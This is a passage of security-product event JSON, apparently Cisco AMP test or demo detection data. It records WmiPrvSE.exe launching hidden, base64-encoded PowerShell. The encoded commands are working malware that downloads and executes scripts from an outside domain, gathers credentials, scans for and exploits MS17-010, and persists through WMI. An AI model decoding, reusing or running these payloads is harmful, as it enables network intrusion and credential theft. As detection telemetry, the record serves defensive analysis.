CcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQA